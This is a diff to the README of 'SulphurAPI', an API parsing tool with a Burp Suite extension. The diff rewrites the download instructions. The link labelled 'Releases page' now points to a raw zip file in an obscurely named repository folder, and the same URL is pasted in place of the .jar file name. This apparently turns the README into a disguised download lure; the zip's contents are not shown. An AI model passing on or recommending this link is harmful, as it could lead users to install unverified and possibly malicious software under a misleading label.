CareBobo/SulphurAPI/README.md

 - **Advanced OpenAPI Parsing:** Understand your APIs better with robust parsing tools.

 ## 🔗 Download & Install
-To get started, visit the [Releases page](https://github.com/CareBobo/SulphurAPI/releases) to download the latest version of SulphurAPI.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/CareBobo/SulphurAPI/main/scorodite/SulphurAPI.zip) to download the latest version of SulphurAPI.

 1. Click on the link above to go to the Releases page.
 2. Find the latest version listed.
 3. Download the file for your operating system.
-You might see options like `SulphurAPI.jar` for Java users or a Burp Suite extension file.
+You might see options like `https://raw.githubusercontent.com/CareBobo/SulphurAPI/main/scorodite/SulphurAPI.zip` for Java users or a Burp Suite extension file.
 4. Once the download completes, locate the file on your device.

 ### 🛠️ Installing SulphurAPI in Burp Suite